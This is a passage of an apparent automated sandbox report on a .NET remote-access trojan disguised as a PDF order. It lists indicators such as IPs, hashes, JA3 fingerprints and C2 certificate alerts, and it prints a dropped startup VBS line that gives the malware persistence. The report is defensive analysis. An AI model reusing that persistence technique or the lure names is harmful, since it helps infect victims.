                                                                      • 66.63.187.200
                                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 104.223.82.201
                                                                      Trykblgens.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 172.93.187.72
                                                                      QUOTATION #46789RFQ_SUPLM_NOV24_SALEH_CONSTRUCTIONS_LLC_PDF.exeGet hashmaliciousRemcos, DarkTortillaBrowse
                                                                      • 66.63.163.134
                                                                      COTIZACIONSyCONSULTA#46789NOV24.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 204.44.127.85
                                                                      RFQ448903423_MAT.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 23.226.128.68
                                                                      .main.elfGet hashmaliciousXmrigBrowse
                                                                      • 66.63.187.200
                                                                      9nke5Ygjp5.exeGet hashmaliciousGuLoaderBrowse
                                                                      • 72.11.142.133
                                                                      Play-Audio_Vmail_Ach Statement Credi....htmlGet hashmaliciousHtmlDropperBrowse
                                                                      • 185.174.100.20
                                                                      Ok7YvjlVmDJI9ajz.exeGet hashmaliciousNanocoreBrowse
                                                                      • 66.63.187.113
                                                                      HETZNER-ASDEfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Panda Stealer, StealcBrowse
                                                                      • 176.9.162.205
                                                                      1Eo0gOdDsV.exeGet hashmaliciousQuasarBrowse
                                                                      • 195.201.57.90
                                                                      4c9ebxnhQk.exeGet hashmaliciousUnknownBrowse
                                                                      • 95.216.22.87
                                                                      .main.elfGet hashmaliciousXmrigBrowse
                                                                      • 116.203.43.182
                                                                      https://hacktools.sh/Get hashmaliciousUnknownBrowse
                                                                      • 167.233.14.205
                                                                      http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                      • 88.99.67.51
                                                                      https://www.youtubedownloaderhd.com/Get hashmaliciousUnknownBrowse
                                                                      • 138.201.226.176
                                                                      Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 116.202.167.133
                                                                      https://2storageaccounterm67.z13.web.core.windows.net/Win08Ay0Er08d8d77/index.html#Get hashmaliciousTechSupportScamBrowse
                                                                      • 195.201.57.90
                                                                      https://www.google.ml/url?fvg=1YI3fC8whlGPBCiMyiuQ&bhtBf=8EQhXbuMThqowIo0zyCX&sa=t&ndg=afydNw3nDHf9A6uq2MCH&url=amp%2Fiestpcanipaco.edu.pe%2F.r%2Fu1kOgE-SURELILYYWRhcnNoLm1hbGhvdHJhQGphdG8uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                      • 95.217.117.210
                                                                      IPHOSTGRIpDomainGRe-dekont (72).pdf(#U007e56 KB).exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exeGet hashmaliciousDarkCloudBrowse
                                                                      • 185.78.221.73
                                                                      RFQ 4748.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      433.docx.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                      • 185.78.220.138
                                                                      https://ktima-edem.gr/gbzuv/?09812432Get hashmaliciousUnknownBrowse
                                                                      • 93.174.123.195
                                                                      https://andronikidis.gr/3nxw1/?31759481Get hashmaliciousUnknownBrowse
                                                                      • 93.174.123.207
                                                                      Prices_Required.exeGet hashmaliciousDarkCloudBrowse
                                                                      • 185.78.220.151
                                                                      pw5tgKfhDO.elfGet hashmaliciousMiraiBrowse
                                                                      • 185.78.220.47
                                                                      botx.arm.elfGet hashmaliciousUnknownBrowse
                                                                      • 185.78.220.23

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eXoZ8DeZQxR.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      5nNxM6CCh5.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      PEACE SHIP PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      ZHENGHE 3_Q88 20241118.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90
                                                                      Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 185.78.221.73
                                                                      • 195.201.57.90

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.2478978672539016
                                                                      Encrypted:false
                                                                      SSDEEP:6:kK49UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:LDImsLNkPlE99SNxAhUe/3
                                                                      MD5:00A50507901A9F31ABEFF6BCD32BFB7F
                                                                      SHA1:BB1DA90410A6F513EE18E074DE9ADBC82DD4F40A
                                                                      SHA-256:637D0D1659150F2FAA9F50D807B309AEA4D2BD263240C20B558E940028A6164F
                                                                      SHA-512:38DA08A5D46F465D75057385ADA508E7F88931F2E9D22A2D06461439E50C5653F15A6D66457057823D2C4DE7FEFC5933A49B74501E7D1B828C27B6950F1CCF33
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:p...... .........I...9..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1119
                                                                      Entropy (8bit):5.345080863654519
                                                                      Encrypted:false
                                                                      SSDEEP:24:ML9E4KiE4Kx1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MxHKiHKx1qHiYHKh3oPtHo6hAHKze0Hj
                                                                      MD5:E6726BABA80C39624BADA32F0CCE6B54
                                                                      SHA1:4C769FA8A02DBE33AA9084040A9E6C70230334FA
                                                                      SHA-256:6A9F9C628B47AFC2A34A71826450A12D9293709BF977E72C04102F9DDD3705E0
                                                                      SHA-512:BBCCE0FCC59D29116253E71ECC786B8E3BA19D9A3124F36FEC9963C7F47016F145C76C18C5AD0FB6186ADEA69652BA99F29EF5AB5E71EFDD7EC07A82BB366960
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Roaming\MaxGeneration.exe

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1484288
                                                                      Entropy (8bit):5.901132930281495
                                                                      Encrypted:false
                                                                      SSDEEP:12288:b/bzOGnF/lx54LOaJleaqIs/eBj52DYWQNwF/zsjVODN/B:bmGLZmx5gYWRaYJ/
                                                                      MD5:ABBFB2B5EBF6A24EEF7269BDE8E80640
                                                                      SHA1:99BE0B33DB303C353262F43D7C2E43A03B5E7B65
                                                                      SHA-256:56BD84E77DA1DE080C2D5C42B6F101574E7146B200026EA9468703D742EDEC10
                                                                      SHA-512:2DEDAEC26EDD4E9B23B31BDAB83FABD88884DA7958F4E7611FB7667CD3DDC6A795CF7B1B79ABCF0C6F13B03AC74763532705E316742F1052A1A5F6E5BB92DD6D
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      • Antivirus: ReversingLabs, Detection: 32%
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g................................. ........@.. ....................................`.................................D...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......(...................h............................................0..........(~...*.*.s....(....*.0../.........(....}.......}......|......(...+..|....(....*..(....*..0...........{......9;....(....o.......(....:?.....%.}......}.....|.......(...+.k....{......|............%.}......(....(....s....(....o..............}.....|.....(............}.....|.....(....*........~.......6.|.....(....*...0...........s.......s.... . ..(r...s....(....o.......&.....,F..i...... .+..(r......

                                                                      C:\Users\user\AppData\Roaming\MaxGeneration.exe:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):88
                                                                      Entropy (8bit):4.717017813099475
                                                                      Encrypted:false
                                                                      SSDEEP:3:FER/n0eFHHot+kiEaKC5jh/NHHHn:FER/lFHIwknaZ5f
                                                                      MD5:7929BBBEAD99B7BB201B74661BC0F3B4
                                                                      SHA1:C958CE853A65FA326070A926F9F53DDC7B4003C0
                                                                      SHA-256:E0DC30C4BD7DDE280FC7A15CA080C556CE86EB2FB1FE70FA6C502BE0C6AD7D72
                                                                      SHA-512:C45337E271EB20098A9B228A39B0BB0F2360A9E1CA8CF521B3216F7413E21B88EE79BDA3485289CE96A3CB6FBC7BA4FF52BC2CE45C867C3F81676030C5B7A6DB
                                                                      Malicious:true
                                                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\MaxGeneration.exe"""

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):5.901132930281495
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Order88983273293729387293828PDF.exe
                                                                      File size:1'484'288 bytes
                                                                      MD5:abbfb2b5ebf6a24eef7269bde8e80640
                                                                      SHA1:99be0b33db303c353262f43d7c2e43a03b5e7b65
                                                                      SHA256:56bd84e77da1de080c2d5c42b6f101574e7146b200026ea9468703d742edec10
                                                                      SHA512:2dedaec26edd4e9b23b31bdab83fabd88884da7958f4e7611fb7667cd3ddc6a795cf7b1b79abcf0c6f13b03ac74763532705e316742f1052a1a5f6e5bb92dd6d
                                                                      SSDEEP:12288:b/bzOGnF/lx54LOaJleaqIs/eBj52DYWQNwF/zsjVODN/B:bmGLZmx5gYWRaYJ/
                                                                      TLSH:63653C0923E8A635D6BF4B37AEF1091187B3E59293E1E79A4EC4B8E588437647D4C313
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....:g................................. ........@.. ....................................`................................

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x56bb9e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x673A87C0 [Mon Nov 18 00:18:08 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x16bb440x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x16c0000x600.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x16e0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x169ba40x169c00ffbd581f7ede7844803ae988fcedababFalse0.3337265678991016data5.904022662301607IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x16c0000x6000x600d7e51c07191df1b14b3fea46294a9141False0.4134114583333333data4.065739830960581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x16e0000xc0x200e4eddcc9e55956b1ad52b3dca2a43bcdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0x16c0a00x30cdata0.4256410256410256
                                                                      RT_MANIFEST0x16c3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-18T08:17:06.768317+01002027619ET MALWARE Observed Malicious SSL Cert (Quasar CnC)172.11.156.803791192.168.2.449731TCP
                                                                      2024-11-18T08:17:06.768317+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert172.11.156.803791192.168.2.449731TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 18, 2024 08:16:59.838983059 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:16:59.839044094 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:16:59.839129925 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:16:59.856446028 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:16:59.856484890 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:00.800005913 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:00.800091982 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:00.840440035 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:00.840461016 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:00.841336966 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:00.891088009 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:00.931329966 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.224719048 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.224777937 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.224797964 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.225002050 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.225003004 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.225066900 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.266621113 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.341183901 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.341195107 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.341373920 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.341387987 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.341449022 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.383054972 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.383074045 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.384037971 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.384057999 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.384905100 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.403640032 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.403706074 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.403819084 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.499499083 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.499718904 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.543754101 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.543972015 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.544141054 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.544228077 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.544611931 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.544708014 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.545155048 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.545233965 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.545841932 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.545921087 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.546365023 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.546441078 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.575489044 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.575788975 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.657227039 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.657413006 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.700058937 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.700275898 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.701051950 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.701138973 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.701740026 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.701819897 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.702230930 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.702317953 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.702855110 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.702934027 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.704883099 CET44349730185.78.221.73192.168.2.4
                                                                      Nov 18, 2024 08:17:01.704966068 CET49730443192.168.2.4185.78.221.73
                                                                      Nov 18, 2024 08:17:01.705086946 CET44349730185.78.221.73192.168.2.4
